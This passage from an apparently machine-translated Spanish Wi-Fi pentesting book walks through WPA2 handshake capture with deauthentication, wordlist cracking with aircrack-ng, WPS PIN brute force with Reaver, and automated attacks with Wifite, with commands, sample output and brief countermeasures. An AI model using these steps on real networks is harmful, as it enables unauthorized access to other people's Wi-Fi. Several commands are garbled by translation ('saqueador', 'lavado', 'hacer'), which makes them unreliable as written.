BSSID Balizas PWR RXQ #Datos, #/s CH MB ENC CIPHER AUTH ESSID

64: 66: B3: 6E: B0: 8A -47 100 119 13 2 11 54e. WPA2 CCMP PSK rootsh3ll

BSSID ESTACIÓN Tasa de PWR Perdió Sonda de marcos

[Link] [Link]-24 0 -24 30 46

Aquí "rootsh3ll" es el nombre de archivo de salida proporcionado al parámetro -w

Paso 4: Desconecta el cliente con aireplay-ng.

Capturar un apretón de manos es posible de 2 maneras,

1. Espere a que un cliente se conecte.

2. Desconecte el cliente ya conectado.

54
Machine Translated by Google

Esperar a que un cliente se conecte puede ser un proceso lento. Ya sea en nuestro caso, la opción 2 es simplemente
perfecta ya que tenemos un cliente conectado al AP inalámbrico "rootsh3ll".
¿Cómo funciona? usamos una herramienta de la suite aircrack-ng, aireplay-ng, que nos permite crear y enviar una solicitud
de desautenticación al AP deseado con la información que anotamos anteriormente.

En realidad, estamos abusando de una función legítima de Windows (o cualquier otro sistema operativo). Lo que obliga a
la tarjeta inalámbrica a volver a conectarse al AP cuando esté disponible.

En la segunda opción, en realidad nos estamos asegurando de que ocurra la opción 1, para que podamos capturar el
apretón de manos.
1. El cliente se desconecta del AP cuando se recibe el paquete de deauth.
2. Vuelva a conectarse al AP (de mayor intensidad de señal)
3. Ocurre un apretón de manos de 4 vías entre el AP y el cliente
4. Hacker (airodump-ng) captura el apretón de manos de 4 vías.

desconectemos el cliente ahora,

aireplay-ng --deauth 5 -a [Link] wlan0mon
[Link] Esperando marco de baliza (BSSID: [Link]) en el canal 11
NB: este ataque es más efectivo cuando se dirige
un cliente inalámbrico conectado (-c <mac del cliente>).
[Link] Envío de DeAuth a transmisión -- BSSID: [Link]
[Link] Envío de DeAuth a transmisión -- BSSID: [Link]
[Link] Envío de DeAuth a transmisión -- BSSID: [Link]
[Link] Envío de DeAuth a transmisión -- BSSID: [Link]
[Link] Envío de DeAuth a transmisión -- BSSID: [Link]

Desglose de comandos:
--muerte 5: 5 solicitudes de deauth transmitidas con BSSID "rootsh3ll", 0 para interminables
-un: Parámetro para decirle a aireplay-ng el BSSID
wlan0mon: Interfaz de modo de monitor

Paso 5:
Captura el apretón de manos
Mientras tanto, en la parte superior derecha de la ventana de salida de airodump-ng, notará algo como:
Apretón de manos WPA: 64: 66: B3: 6E: B0: 8A

CH 11 ][ Transcurrido: 36 s ][ 2017-07-13 02:01 ][ Protocolo de enlace WPA: [Link]

BSSID Balizas PWR RXQ #Datos, #/s CH MB ENC CIPHER AUTH ESSID

64: 66: B3: 6E: B0: 8A -46 100 357 43 0 11 54e. WPA2 CCMP PSK rootsh3ll

BSSID ESTACIÓN Tasa de PWR Perdió Sonda de marcos

[Link] [Link]-22 1e-24 0 76

Lo que simplemente significa que el protocolo de enlace WPA se ha capturado para el BSSID específico.

Presiona CTRL-C, ya que el apretón de manos ha sido capturado, ahora descifraremos la contraseña usando el apretón de
manos capturado.

55
Machine Translated by Google

Paso 6: Inspección de protocolo de enlace

¿Cómo es un apretón de manos? Abrir Wireshark (Opcional)

Este paso es opcional, puede abrir el archivo PCAP ([Link]) en Wireshark para una inspección manual o para
ver cómo se ve un apretón de manos.

Sintaxis: Wireshark [archivo .cap], que en nuestro caso es

wireshark [Link]

Escriba eapol en el campo de filtro de visualización, presione [ENTER] para aplicar el filtro.

Notará que la última columna, "Información" , muestra un mensaje no. del 1 al 4

Este es el apretón de manos de 4 vías que ocurrió durante la captura. Es AP y Cliente hablando entre sí. Observe la
pestaña Origen y Destino .

pasando al siguiente paso,

Paso 7: Una fea verdad de Cracking

“Una vez que tomas el apretón de manos, tus posibilidades de descifrar la clave son tan buenas como tu lista de palabras”
-Un hacker WiFi legítimo

El descifrado de contraseñas WPA2 no es determinista como WEP, porque se basa en un diccionario de palabras posibles
y no sabemos si la frase de contraseña está en la lista de palabras o no. Asi que,
nunca está seguro de si un diccionario específico funcionaría o no.
Para este tutorial, tengo una lista de palabras bellamente elaborada, en serio, ¡es una obra de arte! solo para demostrar
cómo se vería la salida de la contraseña descifrada.

Comando y la lista de palabras se ve así:

echo “iamrootsh3ll” > dictado
dictado de gato

iamrootsh3ll

Aquí guardé directamente la contraseña en la lista de palabras para demostrar cómo se vería la salida, la tuya sería
diferente, obviamente.
Enciende aircrack-ng y descifra la llave
Sintaxis del comando: aircrack-ng [archivo .cap] -w [ruta/a/lista de palabras], que en nuestro caso se ve así:

56
Machine Translated by Google

aircrack-ng [Link] -w ./dict

Punto "." Representa el directorio actual y la barra inclinada "/" significa dentro del directorio (no archivo). Lo que
explica que "./dict" significa que un archivo llamado dict está dentro (/) del directorio actual (.)

aircrack-ng ha descifrado la contraseña de una sola vez.

Es bastante extraño ver la frase de contraseña descifrada por primera vez, ¿verdad?
Aquí hay una salida de muestra del proceso en ejecución, la suya se vería igual durante el proceso de craqueo.

Aircrack-ng 1.2 rc4

[Link] Teclas 1/0 probadas (47.56 k/s)

Tiempo restante: 0 segundos inf%

¡LLAVE ENCONTRADA! [ soyrootsh3ll ]

Llave maestra : 1F 4B 02 FE 4C 82 F4 E0 26 2E 60 97 E7 BA D1 F1
92 83 B6 68 7F 08 4F 73 33 1D B8 6C 62 49 8B 40

Clave transitoria: D9 E6 11 68 BC F0 0D DF 75 BB 36 ED 38 F2 8A 22
BA DA 5F 97 CF 2E 6F B1 49 3A 53 2B 45 78 7C 0C
56 C8 CE D5 BD 64 99 04 E7 0C 1A 7C 2C D7 87 C4
D5 90 50 E6 ED 40 60 94 BB C9 06 AA 55 35 FF 88

EAPOL HMAC : 99 92 11 87 16 7C 8D F2 D1 F9 9B 8E DF 6F 4D 86

¿Recuerda el archivo [Link] que creamos al configurar la tarjeta alfa? Haga coincidir su variable psk y la clave
maestra de aircrack-ng . Nos verifica que la clave esté descifrada correctamente, como ya la conocíamos

contramedidas

Utilice una contraseña segura. Y no seas ese tipo...

Ejemplo: Myp@sword8@#, es una contraseña segura

como tiene

1. Sin orden en idioma inglés simple

2. Contraseña de 13 caracteres, muy segura
3. Caracteres alfanuméricos y especiales en uno hacen una
contraseña muy fuerte.
4. Caracteres en mayúsculas y minúsculas.
5. Sin patrón
6. No es un número de móvil, ya que los números de móvil se pueden adivinar fácilmente.

O simplemente puede mantener una contraseña con algunos caracteres especiales, una palabra que no sea un patrón o

57
Machine Translated by Google

una palabra del diccionario.

Conclusión
Aprendimos el proceso involucrado en el craqueo de WPA.
Aquí hay una lista de comandos que pasamos por la captura y el proceso de descifrado

airmon-ng check kill #Matar procesos problemáticos

airmon-ng start wlan0
airodump-ng wlan0mon
airodump-ng --bssid 64: 66: B3: 6E: B0: 8A -c 11 wlan0mon -w rootsh3ll aireplay-ng
--deauth 5 -a 64:66 : B3: 6E: B0: 8A wlan0mon aircrack-ng [Link] dictado
#Descifrar la frase de contraseña

Eso es todo para WPA2 por ahora.

En el próximo capítulo, aprenderemos cómo descifrar WPS y por qué WPS.

58
Machine Translated by Google

Agrietamiento WPS

¿Qué es WPS?
WPS significa Wi-Fi Protected Setup y fue diseñado para simplificar la configuración de un AP seguro para el propietario
promedio. Presentado por primera vez en 2006, en 2011 se descubrió que tenía un grave defecto de diseño. El PIN WPS
podría ser de fuerza bruta en lugar de simplemente usar herramientas como Reaver.

¿Qué es Reaver?
Reaver es una herramienta gratuita de descifrado de WPS de código abierto que explota un agujero de seguridad en
los enrutadores inalámbricos y puede descifrar la contraseña actual del enrutador habilitado para WPS con relativa
facilidad. Viene preinstalado en Kali Linux y se puede instalar en otras distribuciones de Linux a través del código fuente.
Reaver realiza un ataque de fuerza bruta contra el número de pin de configuración protegida Wi-Fi de un punto de acceso.
Una vez que se encuentra el pin WPS, se puede recuperar el WPA PSK

Descripción:
Reaver-wps apunta a la funcionalidad de registro externo exigida por la especificación de configuración protegida
Wi-Fi. Los puntos de acceso proporcionarán a los registradores autenticados su configuración inalámbrica actual
(incluido WPA PSK) y también aceptarán una nueva configuración del registrador.

Para autenticarse como registrador, el registrador debe demostrar su conocimiento de los AP 8-

número pin de dígitos. Los registradores pueden autenticarse en un AP en cualquier momento sin interacción del usuario.
Debido a que el protocolo WPS se lleva a cabo sobre EAP, el registrador solo necesita estar asociado con el AP y no
necesita ningún conocimiento previo de la configuración o el cifrado inalámbrico.

Reaver-wps realiza un ataque de fuerza bruta contra el AP, intentando todas las combinaciones posibles para
adivinar el número pin de 8 dígitos del AP. Dado que los números de pin son todos numéricos, hay 10^8 (100 000
000-1 = 99 999 999 ) valores posibles para cualquier número de pin dado, considerando que 00 000 000 no es la
clave. Sin embargo, debido a que el último dígito del pin es un valor de suma de verificación que se puede calcular en
función de los 7 dígitos anteriores, ese espacio de claves se reduce a 10 ^ 7 (10,000,000-1 = 9,999,999) valores posibles,
nuevamente como suma de verificación de los primeros 6 ceros será cero, eliminamos 0,000,000 para que sea de fuerza
bruta.
El espacio de la clave se reduce aún más debido a que el protocolo de autenticación WPS corta el pin por la mitad y
valida cada mitad individualmente. Eso significa que hay (10^4)-1, es decir , 9999 valores posibles para la primera mitad
del pin y (10^3)-1, es decir , 999 valores posibles para la segunda mitad del pin, con el último dígito del pin siendo una
suma de control.
Reaver-wps fuerza bruta la primera mitad del pin y luego la segunda mitad del pin, lo que significa que todo el
espacio clave para el número de pin WPS se puede agotar en 10,999 intentos. La velocidad a la que Reaver
puede probar los números pin está completamente limitada por la velocidad a la que el AP puede procesar las
solicitudes de WPS. Algunos AP son lo suficientemente rápidos como para que uno

59
Machine Translated by Google

el pin se puede probar cada segundo; otros son más lentos y solo permiten un pin cada diez segundos.
Estadísticamente, solo tomará la mitad de ese tiempo adivinar el número pin correcto.

Instalación de Reaver desde el código fuente:

Sistema: Ubuntu/Debian
sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev
wget [Link]
alquitrán zxvf [Link]
cd reaver-1.4
cd origen
./configurar
hacer
sudo hacer instalar

Si ha leído el tutorial anterior, sabrá que primero tenemos que poner nuestra tarjeta inalámbrica en modo monitor y luego
comenzar a escanear.

Paso 1: Poner la tarjeta en modo monitor

Primero elimine los programas que pueden causar problemas, luego pondremos nuestra tarjeta en modo monitor.
sudo airmon-ng comprobar matar
sudo airmon-ng iniciar wlan0

wlan1 es la interfaz inalámbrica en mi caso, puedes verificar la tuya simplemente escribiendo terminal.
iwconfig

Paso 2: escanear el aire en busca de redes WPS

Airodump-ng tiene una limitación, no puede detectar enrutadores habilitados para WPS. Entonces, para ese propósito, usamos
el comando de lavado que se instala junto con Reaver y nos ayuda a buscar enrutadores habilitados para WPS.

sudo wash -i wlan0mon

Mostrará una salida similar:

Tenga en cuenta la columna "WPS bloqueado"; esto está lejos de ser un indicador definitivo, pero en general, encontrará
que los AP que se enumeran como desbloqueados tienen muchas más probabilidades de ser susceptibles a ataques brutos.

60
Machine Translated by Google

forzando Todavía puede intentar lanzar un ataque contra una red que está bloqueada por WPS, pero las posibilidades de éxito

no son muy buenas. Aquí,

ESSID/Objetivo: raícesh3ll
BSSID: [Link]
Canal: 11
WPS bloqueado: Sí

En caso de que obtenga una salida como esta:

Simplemente agregue -C o --ignore-fcs con el comando anterior para omitir

lavado -i wlan0mon -C
lavado -i wlan0mon --ignore-fcs

Ambos funcionarán de la misma manera e ignorarán los paquetes FCS y obtendrá el resultado que se muestra anteriormente.

Paso 3: enciende Reaver

Después de obtener el BSSID del punto de acceso objetivo, use Reaver para intentar un ataque de pin WPS en él.
saqueador -i wlan0mon -b [Link]

En algunos casos, otro atacante puede ocultar o duplicar el BSSID. En ese caso, Reaver no podrá realizar con éxito un
ataque de PIN WPS. Tendrá que ser más preciso al proporcionar el ESSID y el número de canal, le comentamos
anteriormente a Reaver.

reaver -i wlan0mon -b [Link] -c 11 -e “rootsh3ll”

ESSID puede contener espacios, así que siempre incluya ESSID entre comillas.

Paso 4: descifrar WPS

Esta parte en realidad la realiza Reaver, ya que le hemos proporcionado la información necesaria. Si el enrutador es vulnerable
al ataque WPS Pin, le mostrará una salida como esta:

[+] Probando pin 12345670

[+] Envío de solicitud EAPOL START
[+] Solicitud de identidad recibida
[+] Envío de respuesta de identidad

61
Machine Translated by Google

[+] Mensaje M1 recibido

[+] Enviando mensaje M2
[+] Mensaje M3 recibido
[+] Enviando mensaje M4
[+] Recibió WSC NACK
[+] Enviando WSC NACK
[+] Pin de prueba 00005678

Si Reaver logra probar un pin tras otro, es probable que el pin WPS y la clave WPA2-PSK
correspondiente se rompan en un par de horas (3-5).
Es bastante gracioso que se suponía que WPS proporcionaría facilidad y seguridad a los usuarios domésticos,
pero un enrutador compatible con WPS vulnerable permite que un atacante potencial rompa la seguridad con facilidad.
No solo la clave WPS, sino también la clave precompartida WPA2 que es considerablemente más difícil
de descifrar sin WPS.

Una fea verdad sobre WPS [Para Pentesters]

Es importante tener en cuenta que los nuevos AP ya no tienen esta vulnerabilidad. Este ataque solo
funcionará en los enrutadores vendidos durante ese 2006 y principios de 2012. Dado que las personas
conservan los enrutadores durante muchos años, todavía hay muchos vulnerables. Así que de vez en cuando
esta técnica podría ser útil.

Controladores inalámbricos compatibles

Los siguientes controladores inalámbricos han sido probados o se ha informado que funcionan correctamente con
Reaver-wps:
• ath9k
• rtl8187
• carl19170
• ipw2000
• rt2800pci
• rt73usb

parcialmente compatible
Los siguientes controladores inalámbricos han tenido un éxito mixto y pueden funcionar o no según su
tarjeta inalámbrica (es decir, si tiene problemas con estos controladores/tarjetas, considere probar una
tarjeta nueva antes de enviar un ticket de problema):
• ath5k
• iwlan
• rtl2800usb
• b43

No soportado
Las siguientes tarjetas/controladores inalámbricos han sido probados o se informó que no funcionan correctamente con
Saqueador:

• iwl4965

62
Machine Translated by Google

• RT3070L
• Netgear WG111v3

contramedidas
1. Apague el WPS con el botón WPS, si es vulnerable.
2. No use WPS, si su enrutador es vulnerable y use una frase de contraseña WPA2 segura.
3. Verifique si su enrutador se fabricó después de 2012, puede que no sea vulnerable.

63
Machine Translated by Google

3
WiFi automatizado
Agrietamiento

Wifite: Herramienta automatizada de piratería/auditoría inalámbrica

Wifite es una herramienta para auditar redes inalámbricas encriptadas WEP o WPA/2. Utiliza herramientas aircrack-ng,
pyrit, reaver, tshark para realizar la auditoría. Es una herramienta de plataforma Linux (viene preinstalada en Kali,
Backtrack, Pentoo, BackBox y otras distribuciones de pentesting) codificada en Python. Automatiza el proceso de piratería
de Wi-Fi y tiene como objetivo minimizar las entradas del usuario mediante el escaneo y el uso de bibliotecas de Python
para técnicas de automatización.
Utiliza herramientas como aircrack-ng, reaver, tshark, cowpatty para varios propósitos como

• Activación del modo de monitor

• Escaneo de aire

• Captura de apretón de manos

• Validación del apretón de manos

• Clave de craqueo

• análisis de salida y paquetes capturados, etc.

64
Machine Translated by Google

Antes de iniciar la herramienta, necesitamos aprender cómo instalarla y hacer que funcione como un comando, tal
como viene en todas las distribuciones de pentesting. Estos son los pasos que cubriremos en este tutorial.

• Descargando Wifite
• Instalación de Wifite como comando del sistema
• Descifrar WEP usando Wifite
• Descifrar WPA/2 usando Wifite
• Cómo corregir el error de captura de protocolo de enlace WPA/2 en Wifite
• Wi-Fi de enfoque
Vamos a empezar.

Descargar Wifite
Wifite estaba alojado anteriormente en [Link], pero ahora es un proyecto completo y está alojado en
GitHub. Para obtener las últimas actualizaciones, debe ir al enlace de GitHub, que puede encontrar en los resultados del
motor de búsqueda.
Puede descargarlo directamente aquí [Link]
La última versión (en el momento de escribir este artículo) es r87. Kali incluye la versión r87 por defecto, pero esa
versión tiene un error que veremos solucionar en este tutorial.

Instalación de una herramienta (Wifite) como comando en Linux

Haciéndolo útil para simplemente abrir la terminal, o acceder a ella desde cualquier lugar, y usar wifite como comando y
no como una ruta/hacia/[Link]. Esto no solo está limitado para este script, es decir, Wifite, sino que puede aplicarlo a
cualquier herramienta/script/programa de trabajo en su plataforma Linux para crearlo y ejecutarlo como un comando.

Ya hemos descargado el último script de Wifite y asumimos que está almacenado en nuestro escritorio.

Mover al escritorio

cd ~/Escritorio

~ refleja el directorio HOME en el shell. Verifique su directorio de inicio con echo $HOME
Aquí $HOME es una variable de entorno. /Desktop es el directorio almacenado en el directorio HOME.

descomprimir wifite * .zip

unzip es la herramienta para extraer archivos de un archivo .zip. wifite*.zip significa cualquier archivo cuyo nombre inicial
sea Wifite y termine en .zip, aquí "*" significa cualquier cosa (incluido el espacio en blanco).

cd wifi*/

Cambia el puntero al primer directorio que comienza con el nombre "wifite" y / simboliza el directorio.
comprobar si el script funciona o no,

sesenta y cinco
Machine Translated by Google

python [Link]

como wifite es un script de python. Si (o cualquier secuencia de comandos) funciona bien, es posible que desee
convertirlo en un comando del sistema para que no tenga que atravesar el directorio cada vez. Es mejor simplemente
abrir la terminal y ponerse a trabajar.
Para eso, debe saber dónde se almacenan los comandos ejecutables reales en Linux, para que podamos hacer
una copia allí. Al igual que en los sistemas Windows, todos los comandos CMD se almacenan en \WINDOWS\System32\.

“
Ingrese cuál seguido de un simple "comando de Linux

cual es

qué comando nos dice la ubicación del comando pasado como argumento. que es ls (ell-ess) en este caso. Reflejará /
usr/ bin/ ls como salida.
Desde aquí sabemos que ls, el archivo ejecutable se almacena en el directorio /usr/ bin .
Ahora, lo que tenemos que hacer es mover nuestro script wifite a /usr/ bin/ y hacerlo ejecutable, si no lo está ya.

Moviendo [Link] a /usr/bin/ (estamos en ~/Desktop/wifite/). Usa sudo si no eres root

sudo cp [Link] / usr / bin / wifite

sudo significa Superusuario DO. Se utiliza para tomar el permiso de raíz (superusuario) para realizar ciertas
tareas.

cp se usa para copiar archivos, Sintaxis: cp “Fuente” “Destino”, donde la Fuente es [Link] y el destino es /usr/
bin/wifite. Además, wifite es el nombre del archivo de salida que nos gustaría usar como comando.

cp [Link] /usr/bin/[Link]
ls -l ./[Link] /usr/bin/wifite
-rwxr-xr-x 1 raíz raíz 161588 4 de julio 15:10 /usr/bin/[Link]
-rwxr-xr-x 1 raíz raíz 161588 4 de julio 15:08 [Link]

Aquí rwx significa Lectura, Escritura, Ejecutable. Todos ellos son atributos de archivo.
Hacer que wifite sea ejecutable (si no lo está ya), de modo que no sea necesario escribir python antes del archivo
nombre.

sudo chmod + x / usr / bin / wifite

chmod cambia el modo de archivo (/ usr/ bin/ wifite) a +x, es decir, ejecutable.
Ahora wifite es un comando del sistema que puede ingresar sudo wifite en cualquier lugar de la Terminal (como root)
Pasemos ahora al Cracking.

Crackear WEP usando Wifite

Descifrar WEP usando cualquier herramienta automatizada es una tarea demasiado fácil ya que no tiene que analizar

cualquier cosa, solo vea el objetivo, elija AP vulnerable y presione [ENTER].

66
Machine Translated by Google

No recomiendo usar ninguna herramienta de automatización a menos que haya aprendido el funcionamiento real de la secuencia de

comandos o el proceso que se ejecuta detrás de la secuencia de comandos. Los guiones son solo para reducir el tiempo y el esfuerzo.

Por favor, no confíe en los scripts. Mejor siga adelante y aprenda el proceso real por sí mismo, luego use herramientas de automatización

para ahorrar tiempo.

Estoy ejecutando una cuenta raíz de forma predeterminada. Si está ejecutando una cuenta estándar, use sudo.

wifi

Después de ejecutar wifite, espere a que le muestre la lista de puntos de acceso.

Presione CTRL-C y seleccione el AP deseado con el tipo de encriptación WEP y escriba su NUM, vea la imagen a continuación.

Solo espere a que Wifite capture los IV (Vector de inicialización) y descifre la clave por usted.

El craqueo WEP es el más fácil de todos. esa es una de las razones por las que WEP ahora está depreciado, pero aún puede

encontrarlo en muchos lugares donde las personas no han cambiado su enrutador por un tiempo.

Cosas a tener en cuenta:

1. Wifite inicia el cracking después de 10K IVs.

2. Es posible que se requieran alrededor de 60ÿ000 IV para descifrar la clave.

3. La tasa de éxito es del 99,9 %.

4. Asegúrese de que la velocidad de captura sea de más de 100 IV/segundo.

67
Machine Translated by Google

Después de que Wifite capture suficientes IV para descifrar la clave WEP, verá un resultado similar:

Tenga en cuenta que en la imagen de arriba, el total de IV capturados es de 52ÿ846 con una velocidad de 857 IV/ seg y la

clave está descifrada.

Si tiene suficientes IV, la clave WEP se descifrará con seguridad, independientemente de la longitud y la

complejidad de la clave.

¿Como arreglarlo? Como se dijo anteriormente, use WPA/2.

Pasemos al cracking WPA/2.

68
Machine Translated by Google

Crackear WPA/2 usando Wifite

A diferencia de WEP, el algoritmo de cifrado WPA/2 es mucho más fuerte y quizás se considere el cifrado más fuerte
en este momento. El algoritmo de cifrado WPA2 no está realmente roto, pero manipulamos el mecanismo de
autenticación de clave utilizado por WPA2 para descubrir la clave.
Similar al ejemplo anterior.

Ejecute wifite y seleccione el AP deseado (habilitado para WPA/2).

Los primeros pasos pueden ser algo así:

Nuestro objetivo es rootsh3ll, que es de tipo WPA2.

También puede seleccionar múltiples AP, simplemente colocando comas. Ej: 4,1,3,2
Aquí el orden seguirá de acuerdo con la entrada, lo que significa que Wifite probará el AP n.º 4 en primer lugar, el AP n.º 1 en segundo

lugar y así sucesivamente a medida que se proporcione la entrada.

Después de capturar el protocolo de enlace, Wifite puede comportarse de 2 formas según las versiones (r87 o
anterior)

versión r87: Selecciona un diccionario predeterminado ya almacenado en Kali Linux.

Ej: [Link], [Link] , etc. En la nueva versión, el diccionario predeterminado utilizado se
encuentra aquí: /usr/ share/ fuzzdb/ wordlists-user-passwd/ passwds/ [Link]

versión r85 o anterior: no utiliza ninguna lista de palabras hasta que se proporciona la opción -dict junto con un
archivo de diccionario. Ejemplo:

wifite -dict /ruta/al/[Link]

Poco después de que Wifite(r87) capture el protocolo de enlace, debería ver una opción similar:

69
Machine Translated by Google

Wifite usó un diccionario almacenado en Kali Linux por sí mismo, no se proporcionó ninguna opción y la contraseña no estaba

en el diccionario, por lo que falló el intento de crack.

Eso es lo que suele ocurrir en el craqueo de WPA2. El cracking no tiene éxito ya que hay enormes no. de

posibilidades para contraseñas de tipo WPA2 que miente de 8 a 63 caracteres

distancia. Que podría ser una combinación de alfabetos [az, Az], números [0-9] y caracteres especiales (!, @, #, $, etc.)

Pero no hay necesidad de sentirse bajo. También existen varios métodos para recuperar la frase de contraseña WPA2, algunos
de los cuales aprenderemos en este libro.

En la imagen de arriba, puedes ver la ruta en la que Wifite ha almacenado el .cap (handshake)

archivo, es decir, /hs/. Puede copiar el archivo y usarlo para la fuerza bruta manual.

¿Cómo reparar el error de captura de protocolo de enlace WPA/2 en Wifite?

Si usa Wifite con frecuencia, es posible que haya encontrado un problema relacionado con la parte de captura de protocolo

de enlace de Wifite. Si no está familiarizado, aquí está el error:

Wifite sigue escuchando el apretón de manos y desactivando a los clientes conectados en un bucle y no captura ningún

apretón de manos por ningún motivo. Mientras que si inicia airodump-ng en una nueva terminal, capturará los apretones de

manos. Wifite está desactivando a los clientes una y otra vez airodump-ng seguirá capturando los apretones de manos.

Entonces, ¿cuál es el problema? es con el guion?

Sí, hubo un problema en el script de Wifite (r85, 587 [antiguo] en el que no se garantizaba que la desautorización

automática durante la captura del protocolo de enlace se deshabilitara en los intervalos esperados, lo que resultaba en la

falla de la captura del protocolo de enlace).

Este problema se puede solucionar de 2 maneras:

1. Use airodump-ng para capturar archivos.

2. Usa la última versión de Wifite

70
Machine Translated by Google

Uso de airodump-ng para solucionar el problema de Wifite Handshake

Éste es muy simple. Mientras Wifite se ejecuta en segundo plano y no puede capturar el protocolo de
enlace. simplemente abra una nueva Terminal y ejecute airodump-ng seguido del nombre de archivo
de salida y la interfaz BSSID y channel_no .

airodump-ng wlan0mon -c 11 -w cap_file -b <BSSID>

Si hay clientes conectados, Wifite los desactivará y airodump-ng capturará el protocolo de enlace.

Luego presione CTRL-C y diviértase con su archivo capturado.

BSSID, Channel son muy importantes, ya que nuestra tarjeta inalámbrica puede operar en 1 frecuencia a
la vez. Wifite bloquea la tarjeta inalámbrica en el número de canal (frecuencia) similar a los AP para los que
estamos tratando de capturar el protocolo de enlace. Y por defecto, airodump-ng salta entre los canales. Entonces,
para evitar los errores, debemos decirle a airodump-ng que se bloquee en nuestro canal deseado, es decir, el
Canal 11 en este caso. Además, para evitar el apretón de manos de otro AP que podría estar operando en un
canal similar, usamos BSSID como filtro.

Use la última versión de Wifite para solucionar el problema de captura de Handshake

Si está utilizando Kali Linux, BackBox, Ubuntu, Mint, etc. más antiguos y enfrenta el problema, debe intentar
actualizar su versión de Wifite. Puedes hacerlo de 2 maneras.
• Utilice el comando wifite -update . ¿No funcionó?
• Intente descargar manualmente y ejecutar el script.
Aquí hay algo que debe tener en cuenta mientras actualiza usando el comando wifite -update . Es posible
que vea esta salida

`;,
`;, `;, Wi-Fite v2 (r87)
.;' .;' ,;' .;' ,;' ,;' `;, `;, `;,
:: :: : () : :: :: auditor inalámbrico automatizado
':. ':. ':. /_\ ,:' ,:' ,:' /___\ ,:' ,:' diseñado
':. ':. para Linux
':. /_____\ / ,:'
\ [!] la
actualización requiere una conexión a Internet
[+] buscando la última versión...
[-] tu copia de wifite está actualizada
[+] renunciar

Lo que suele suceder es que Wifite busca la última versión en GitHub, no por el tamaño del archivo.
pero por la versión, es decir, r87, que está preinstalada en Kali Linux. Pero aquí hay un problema, si observa la
última actualización de wifite en la página de GitHub, fue hace más de 3 meses y la versión instalada en Kali es
la misma, es decir, r87, pero el tamaño del archivo difiere ya que la versión de wifite de Kali no está fija sino 5
meses. la versión anterior es r87 pero se corrigió.

71
Machine Translated by Google

Lo comprobaremos descargando el último script wifite de GitHub y comparando el tamaño de archivo de ambos scripts.

Esto es lo que obtuve al verificar el tamaño del archivo de ambos scripts wifite, es decir, uno descargado y otro
preinstalado. ambos son r87
ls -lh $(que wifite) [Link]
-rwxr-xr-x 1 raíz raíz 154K 23 de julio de 2016 /usr/bin/wifite
-rwxr-xr-x 1 raíz raíz 158K 4 de julio 15:08 [Link]

ls -l $(que wifite) [Link] -rwxr-xr-x 1 raíz

raíz 157295 23 de julio de 2016 /usr/bin/wifite
-rwxr-xr-x 1 raíz raíz 161588 4 de julio 15:08 [Link]

comprendamos el resultado anterior en 2 partes

ls -lh $(que wifite) [Link]

Desglose de comandos:
ls: El comando se usa para enumerar archivos en un directorio
-lh: determinado, los argumentos de la línea de comando donde 'l' (ell, minúsculas) representa una lista de los detalles del archivo
y 'h' significa que el tamaño del archivo debe ser legible por humanos.

ps Una función bash utilizada para ejecutar otro comando dentro de un comando, que usamos para obtener la ruta al
script wifite instalado usando qué comando.

En el mundo Linux, el punto '.' significa directorio actual, seguido de “/” , es decir, directorio (no archivo).
Entonces “./” significa dentro del directorio actual y ./[Link] es el nombre del archivo ([Link]) en el directorio actual (./)
Permite que bash diferencie la ubicación del archivo con comandos.

Ahora observe el tamaño del archivo para ambos, 154 y 158 KB, respectivamente.
Ahora está familiarizado con los comandos utilizados. Saltemos al tamaño del archivo

Última versión r87: 161588 Bytes

Versión antigua r87: 157295 Bytes

Este cambio en el tamaño se debe al código editado. De la versión anterior, se editan muchas líneas para corregir el
error de Handshake. Por lo tanto, puede usar dos de las opciones para hacer el trabajo.

Wifi enfocado por láser

Centrarse en Wifite significa usar las opciones de wifite para filtrar la salida o el proceso de craqueo para ahorrar el
desorden de la pantalla, la memoria, la vida útil de la tarjeta inalámbrica y, a veces, dolores de cabeza.

Por ejemplo, si estamos interesados en descifrar solo puntos de acceso de tipo WEP, usaremos
tienes -wep -p0841

-p0841 es el tipo de ataque que he encontrado más útil y funciona en la mayoría de los casos, por lo que podría ser
mejor para usted también usar -p0841 al descifrar WEP, lo salvará

72
Machine Translated by Google

mucho tiempo mientras captura IVs.

De manera similar, para WPA/2, también le indicaremos a wifite que use nuestro diccionario deseado

wifite -wpa -w /media/drive/wordlists/MI_DICT.txt

Wifite ahora usará MY_DICT.txt ubicado en /media/ drive/ wordlists/ como una lista de palabras para descifrar la frase de

contraseña WPA/2 después de capturar el protocolo de enlace.

Otros filtros que puede aplicar: 1. Usar un

canal específico 2. BSSID/ESSID

específico 3. Cierto tipo de ataque para

WEP/WPA/2 4. Establecer un límite de tiempo para WEP/

WPA/2 usando las opciones -wept y -wpat 5. y mucho mas.

Solo ejecuta wifite --help

para mostrar todas las opciones y vectores de ataque disponibles.

73
Machine Translated by Google

4
Acelerando WPA/2
Agrietamiento

Introducción
A estas alturas, debe estar familiarizado con la captura del protocolo de enlace de 4 vías y su uso con una lista de
palabras para descifrar el WPA2-PSK. Hay un tremendo espacio de nombres posible de frases de contraseña WPA2
que puede ser alfanumérico incluyendo caracteres especiales (8-63 caracteres). Además, prácticamente no hay
límite para la lista de palabras que podríamos crear. Incluso pueden alcanzar un tamaño de Peta/Exabytes, lo que
llevará tiempo hasta el próximo Big Bang para que la CPU/GPU agote el espacio de nombres, si se trata de una contraseña
segura.

Por lo tanto, debemos descubrir varias formas de descifrar WPA2-PSK en un corto período de tiempo.
Lo cual es posible si de alguna manera obtenemos el PSK a través del panel del enrutador, registrador de teclas o
usamos una GPU (no CPU) para usar sus múltiples núcleos para reducir la duración del craqueo, o incluso algo diferente.
Eso es lo que aprenderemos en este capítulo. Aumentaremos la velocidad de craqueo de WPA2 sin usar ninguna GPU
o nube. Lo cual puede ser muy útil con los AP con nombres muy comunes como "Airtel", "Netgear", "Belkin" , etc.

74
Machine Translated by Google

WPA2 se deriva de una función muy complicada llamada PBKDF2 (Función de derivación de clave basada en
contraseña). Como sugiere el nombre, el cracking depende de la frase de contraseña, también del SSID.
Este es el cuello de botella. PBKDF2 siempre escupe una clave de 256 bits sin importar la contraseña compleja
que le arroje (8-63 caracteres).

La función de derivación de clave PBKDF2 tiene cinco parámetros de entrada:

DK = PBKDF2(PRF, Contraseña, Sal, c, dkLen)

Donde:
FRP: Función pseudoaleatoria de 2 parámetros con longitud de salida hLen
(HMAC-SHA1)
Clave: Contraseña maestra a partir de la cual se genera una clave derivada
Sal: Secuencia de bits, conocida como sal criptográfica
C: Número de iteraciones, 4096 para WPA2
dkLen: Longitud deseada de la clave derivada, 256
